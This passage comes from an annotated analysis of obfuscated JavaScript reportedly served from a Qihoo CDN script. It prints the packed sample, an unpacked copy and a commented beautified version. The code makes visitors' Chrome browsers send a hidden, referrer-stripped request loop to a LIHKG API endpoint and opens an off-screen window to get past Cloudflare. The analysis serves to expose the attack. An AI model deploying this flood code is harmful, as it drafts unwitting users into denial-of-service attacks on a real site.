Date()[c[17]+a[23]+a[4]+b[6]+c[36]+a[51]+b[42]]();timer=setInterval(c[36]+b[43]+c[44]+c[14]+b[23]+b[16]+a[34]+b[20]+b[22]+c[13]+b[42]+c[37]+b[42]+b[34]+a[15],50);count=count+1}starttime=new Date()[_b[23]+_a[4]+_a[37]+_b[6]+_c[25]+_c[51]+_a[4]]();url=url_list[unixtime()%url_list[_a[13]+_c[23]+_c[36]+_b[23]+_c[4]+_c[1]]];imgadd()}}
  24.  
  25. // We also have this sample taken from the Internet Archive
  26. // (http://web.archive.org/web/20190831130059/http://js.passport.qihucdn.com/11.0.1.js?5d5100a4a5a2ac6a47af3cb82952cc7b),
  27. // as well as from the Netherlands, which is packed and then obfuscated again. After
  28. // unpacking we get:
  29.  
  30. var TASKID=33190;var MAGICNUM=11997755;var EXECNUM=100;var FEEDBACKADDR='http://116.255.226.154/';if((/chrome\/([\d]+)/gi.exec(window.navigator.userAgent.toLowerCase())[1]>=34)&&(window.navigator.userAgent.toLowerCase().indexOf("edge")<0)){var MAX_TIME=300000;var MAGIC=0x58585858;var MAX_COUNT=100000;var url_list=['https://lihkg.com/api_v2/thread/latest?cat_id=1&page=1&count=60&type=now&t='];var cloudflare_js_validate_url='https://lihkg.com';var TIMEGAP=500;function unixtime(){var a=new Date();return Date.UTC(a.getFullYear(),a.getMonth(),a.getDate(),a.getHours(),a.getMinutes(),a.getSeconds())/1000}function updateVT(){localStorage.vt=(unixtime()+MAX_TIME/1000)^MAGIC}function canExe(){if(localStorage.vt==null){updateVT();return true}else{if((localStorage.vt^MAGIC)>unixtime()){return(localStorage.cl!='0')}else{if(localStorage.cl!='0'){updateVT();return true}else{return false}}}}if(canExe()==true){localStorage.cl=0;document.getElementsByTagName("head")[0].innerHTML="<meta name=\"referrer\" content=\"no-referrer\">"+document.getElementsByTagName("head")[0].innerHTML;window.onbeforeunload=function(){localStorage.cl=1};var canpop=false;var p_win=null;function popwin(){if(canpop==true){p_win=window.open(cloudflare_js_validate_url,'_blank','toolbar=no,status=no,menubar=no,scrollbars=no,resizable=no,left=100000, top=100000, width=1, height=1, visible=none','');window.focus();canpop=false;document.removeEventListener('click',popwin)}}document.addEventListener('click',popwin);var p_img=null;var timer=null;var starttime=null;var requesttime=null;var responsetime=null;var url='';var count=0;function imgdel(){if(p_img!=null){document.body.removeChild(p_img)}p_img=null;url=url_list[unixtime()%url_list.length];if(count<MAX_COUNT&&responsetime-starttime<MAX_TIME)setTimeout('imgadd()',(responsetime-requesttime)>TIMEGAP?TIMEGAP:(responsetime-requesttime));else localStorage.cl=1}function isImgComplete(){if(p_img.complete){window.clearInterval(timer);responsetime=new 
Date().getTime();if(responsetime-requesttime>1000){if(p_win!=null){p_win.close();p_win=null}count+=1}else{canpop=true}imgdel()}else{if(new Date().getTime()-requesttime>2000){imgdel()}}}function imgadd(){p_img=document.body.appendChild(document.createElement('img'));p_img.src=url+unixtime()+Math.ceil(Math.random()*100);p_img.style.display='none';requesttime=new Date().getTime();timer=setInterval("isImgComplete()",50);count=count+1}starttime=new Date().getTime();url=url_list[unixtime()%url_list.length];imgadd()}}
  31.  
  32. // We don't know what is served to other countries. AFAIK, all samples
  33. // reduce to the unpacked Netherlands sample above. Let's beautify the code:
  34.  
  35. var TASKID = 33190; // not read anywhere else in this listing
  36. var MAGICNUM = 11997755; // not read anywhere else in this listing
  37. var EXECNUM = 100; // not read anywhere else in this listing
  38. var FEEDBACKADDR = 'http://116.255.226.154/'; // never contacted by the code below; the name suggests a reporting endpoint, but nothing here confirms that
  39. // ^ Note: this IP address belongs to ZhengZhou GAINET Computer Network Technology Ltd
  40. //  (河南省郑州市 景安计算机网络技术有限公司) (Ticker symbol 832757 on NEEQ)
  41.  
  42. if ((/chrome\/([\d]+)/gi.exec(window.navigator.userAgent.toLowerCase())[1] >= 34) && (window.navigator.userAgent.toLowerCase().indexOf("edge") < 0)) {
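  43.     // ^ The rest of the script only executes if the browser is Chrome 34+ and not MS Edge. If the user agent has no "chrome/" token, exec() returns null and the [1] lookup throws, which also stops the script.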
  44.  
  45.     var MAX_TIME = 300000;
  46.     // ^ 300000 milliseconds = 5 minutes; used for the localStorage.vt window and for the run-time cap checked in imgdel()
  47.     var MAGIC = 0x58585858; // XOR mask for the timestamp kept in localStorage.vt (0x58 is ASCII 'X')
  48.     var MAX_COUNT = 100000; // cap on `count`, checked in imgdel()
  49.     var url_list = ['https://lihkg.com/api_v2/thread/latest?cat_id=1&page=1&count=60&type=now&t=']; // request targets; imgadd() appends a timestamp and a random number after `t=`, so every requested URL is unique
  50.     var cloudflare_js_validate_url = 'https://lihkg.com'; // page opened by popwin()
  51.     var TIMEGAP = 500;
  52.     // ^ 500 milliseconds = 0.5 seconds; upper bound on the delay between two requests (see imgdel())
  53.  
  54.     function unixtime() { // returns the current time in whole seconds
  55.         var a = new Date();
  56.         return Date.UTC(a.getFullYear(), a.getMonth(), a.getDate(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1000 // local-time fields are fed to Date.UTC, so the value is offset from the real Unix time by the browser's time zone
  57.     }
  58.  
  59.     function updateVT() { // stores "now + MAX_TIME" (in seconds), XORed with MAGIC, in localStorage.vt
  60.         localStorage.vt = (unixtime() + MAX_TIME / 1000) ^ MAGIC
  61.     }
  62.  
  63.     function canExe() { // decides whether this page load starts the request loop
  64.         if (localStorage.vt == null) { // no timestamp stored yet for this origin
  65.             updateVT();
  66.             return true
  67.         } else {
  68.             if ((localStorage.vt ^ MAGIC) > unixtime()) { // stored window has not expired yet
  69.                 return (localStorage.cl != '0') // cl is '0' only while a run is in progress (set to 0 at start, to 1 on unload or when the loop ends)
  70.             } else {
  71.                 if (localStorage.cl != '0') {
  72.                     updateVT(); // window expired: start a new one and run
  73.                     return true
  74.                 } else {
  75.                     return false // cl still '0': nothing in this function resets it, so the script stays off until cl changes
  76.                 }
  77.             }
  78.         }
  79.     } // net effect: once vt exists, the result is simply `cl != '0'`; vt only decides whether the window is refreshed
  80.     if (canExe() == true) {
  81.         // ^ Skips the loop while localStorage.cl is still '0', i.e. while another
  82.         //   run in this origin has not ended. The 5-minute window in vt does _not_
  83.         //   throttle new runs; the run-time cap is enforced separately in imgdel().
  84.  
  85.         localStorage.cl = 0; // mark a run as in progress (canExe() compares against the string '0')
  86.         document.getElementsByTagName("head")[0].innerHTML = "<meta name=\"referrer\" content=\"no-referrer\">" + document.getElementsByTagName("head")[0].innerHTML;
  87.         // ^ Hide where the requests are coming from: with this meta tag the browser sends them without a Referer header.
  88.  
  89.         window.onbeforeunload = function () { // leaving the page marks the run as ended
  90.             localStorage.cl = 1
  91.         };
  92.         var canpop = false; // set to true by isImgComplete() after a response that took at most 1 s
  93.         var p_win = null; // handle of the window opened by popwin()
  94.  
  95.         function popwin() { // click handler; does nothing until canpop is true
  96.             if (canpop == true) {
  97.                 p_win = window.open(cloudflare_js_validate_url, '_blank', 'toolbar=no,status=no,menubar=no,scrollbars=no,resizable=no,left=100000, top=100000, width=1, height=1, visible=none', ''); // requests a 1x1 window positioned far off-screen
  98.                 window.focus(); // called on the current window, not on p_win
  99.                 canpop = false;
  100.                 document.removeEventListener('click', popwin) // the handler is removed the first time this branch runs
  101.             }
  102.         }
  103.         document.addEventListener('click', popwin);
  104.         // ^ On a click anywhere on the injected webpage (once canpop is set), open
  105.         //   the LIHKG main page in a tiny off-screen window and refocus the current
  106.         //   page, potentially to bypass the Cloudflare 5-second check (now useless
  107.         //   against the latest CAPTCHA check).
  108.  
  109.         var p_img = null; // the <img> element of the request in flight
  110.         var timer = null; // id of the setInterval poll started in imgadd()
  111.         var starttime = null; // ms timestamp taken once, just before the first imgadd()
  112.         var requesttime = null; // ms timestamp of the latest request
  113.         var responsetime = null; // ms timestamp of the latest completed load
  114.         var url = ''; // entry of url_list chosen for the next request
  115.         var count = 0; // request counter compared against MAX_COUNT
  116.  
  117.         function imgdel() { // removes the current <img> and schedules the next request
  118.             if (p_img != null) {
  119.                 document.body.removeChild(p_img)
  120.             }
  121.             p_img = null;
  122.             url = url_list[unixtime() % url_list.length]; // with a single entry in url_list this is always index 0
  123.             if (count < MAX_COUNT && responsetime - starttime < MAX_TIME) { // responsetime is only updated on a completed load, so after a timeout this compares a stale value
  124.                 setTimeout('imgadd()', (responsetime - requesttime) > TIMEGAP ? TIMEGAP : (responsetime - requesttime)); // delay = min(last response latency, TIMEGAP); string-form timer, which a CSP script-src without 'unsafe-eval' on the embedding page would refuse
  125.             } else {
  126.                 localStorage.cl = 1 // run finished: clear the in-progress flag
  127.             }
  128.         }
  129.  
  130.         function isImgComplete() { // polled every 50 ms by the interval started in imgadd()
  131.             if (p_img.complete) { // `complete` turns true once the fetch has finished, whether or not the response decodes as an image
  132.                 window.clearInterval(timer);
  133.                 responsetime = new Date().getTime();
  134.                 if (responsetime - requesttime > 1000) { // slow response (> 1 s)
  135.                     if (p_win != null) {
  136.                         p_win.close();
  137.                         p_win = null
  138.                     }
  139.                     count += 1 // on top of the increment in imgadd(), so slow responses count twice
  140.                 } else {
  141.                     canpop = true // fast response: allow popwin() to open its window on the next click
  142.                 }
  143.                 imgdel()
  144.             } else {
  145.                 if (new Date().getTime() - requesttime > 2000) { // give up on a load after 2 s
  146.                     imgdel() // NOTE(review): the interval is not cleared on this path, unlike the branch above
  147.                 }
  148.             }
  149.         }
  150.  
  151.         function imgadd() { // issues one request by attaching a hidden <img>
  152.             p_img = document.body.appendChild(document.createElement('img'));
  153.             p_img.src = url + unixtime() + Math.ceil(Math.random() * 100); // cache-buster: seconds timestamp immediately followed by a random integer
  154.             p_img.style.display = 'none';
  155.             requesttime = new Date().getTime();
  156.             timer = setInterval("isImgComplete()", 50); // overwrites any earlier interval id held in `timer`
  157.             count = count + 1
  158.         }
  159.  
  160.         starttime = new Date().getTime();
  161.         url = url_list[unixtime() % url_list.length];
  162.         imgadd()
  163.  
  164.         // What this does:
  165.         //  1. creates a hidden <img> tag with the `src` set to a LIHKG API endpoint plus a unique `t=` value.
  166.         //  2. after the image request completes (or 2 s pass), delete the image.
  167.         //  3. redo step 1 and 2 after a delay of at most 0.5s, until the MAX_COUNT or MAX_TIME check in imgdel() fails.
  168.         // Seen from the server, these requests carry no Referer header (no-referrer meta tag) and a `t=` value made of a seconds timestamp followed by the result of Math.ceil(Math.random() * 100).
  169.         // Since these are executed on client side, this will either bring LIHKG
  170.         // down due to DDoS, or more likely, cause Cloudflare to flag your IP as
  171.         // suspicious and block _you_ from accessing LIHKG.
  172.     }
  173. }